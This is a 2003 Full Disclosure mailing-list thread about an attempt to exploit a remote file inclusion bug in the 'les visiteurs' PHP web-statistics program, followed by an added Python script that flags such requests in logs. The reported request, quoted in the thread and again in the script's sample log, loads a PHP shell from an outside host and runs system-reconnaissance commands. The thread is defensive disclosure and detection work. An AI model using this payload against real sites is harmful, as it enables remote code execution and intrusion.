Full Disclosure
mailing list archives
Re: file inclusion (les visiteurs)
From: gazpa <gazpa () euskalnet net>
Date: Tue, 02 Dec 2003 01:09:51 +0100
Hi Lorenzo,
First, there isn't *their server*. It's somebody else's server
(c2r.canalforbid.org).
Second, they use this server to serve an include file (hax.gif), a PHP
include to *inject* into the buggy 'les visiteurs' (web statistics
program) remotely and execute shell commands.
And I don't think they are kiddies, if they wrote 'hax.gif', as it seems.
Don't blame people who are only intending to advise people about a bug
that is being exploited.
Lorenzo Hernandez Garcia-Hierro wrote:
Hi Daniel,
They are kiddies... :(
I was looking at the files and there are only high-risk-rated exploits
downloaded from Packet Storm, ptrace, etc.
And they are running remote PHP shells on their server.... xD
See you on IRC tonight?
"Evert Daman" <evert () digipix org> wrote:
Last night Snort detected this request:
GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
Because I patched 'les visiteurs' as described by 'matthieu peschaud'
on Bugtraq on the 26th of October nothing happened, but it looks like someone is trying to exploit this bug.
Just want to mention it to this wonderful list :)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
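The request Snort caught is the classic signature of a PHP remote file inclusion: an include-path parameter (here lvc_include_dir) whose value is a URL on another host. As an added example, not code from the thread or from 'les visiteurs', the script below scans HTTP request lines for exactly that pattern; the sample log is constructed (line 1 is the request quoted above with an HTTP version appended, the rest are made up).

```python
"""Flag remote-file-inclusion (RFI) attempts in HTTP request lines.

Added example, not code from the original thread: it scans request lines like
the one Snort reported for a query parameter whose value is a remote URL, the
tell-tale sign of a PHP remote include such as the 'les visiteurs'
lvc_include_dir bug. The sample requests below are constructed for the demo.
"""
from urllib.parse import unquote

# URL schemes PHP's include() will fetch when allow_url_fopen is enabled.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def find_rfi(request_line):
    """Return [(parameter, decoded_value)] for every query parameter whose
    decoded value begins with a remote URL scheme."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    _, sep, query = parts[1].partition("?")  # split at the first '?' only
    if not sep:
        return []
    hits = []
    # Split on '&' ourselves: parse_qsl also splits on ';' in older Pythons,
    # which would tear apart a value such as 'cmd=cd /tmp;id'.
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        decoded = unquote(value).strip().lower()  # one decode pass, like PHP's $_GET
        if decoded.startswith(REMOTE_SCHEMES):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Return [(line_no, parameter, url)] for every flagged request line."""
    findings = []
    for no, line in enumerate(lines, start=1):
        for name, url in find_rfi(line):
            findings.append((no, name, url))
    return findings


# Constructed sample: line 1 is the request from the thread, the others are
# made up (a normal hit, a local include path, a percent-encoded scheme).
SAMPLE_LOG = [
    "GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls HTTP/1.0",
    "GET /counter/index.php?page=1 HTTP/1.1",
    "GET /counter/include/new-visitor.inc.php?lvc_include_dir=./include/ HTTP/1.1",
    "GET /counter/include/new-visitor.inc.php?lvc_include_dir=%48%54%54%50://203.0.113.9/x.txt HTTP/1.1",
]

if __name__ == "__main__":
    for no, name, url in scan_log(SAMPLE_LOG):
        print(f"line {no}: remote include via {name}={url}")
```

Only a remote scheme is flagged; a local traversal value such as ../../etc/passwd is a different (LFI) check and is deliberately out of scope here.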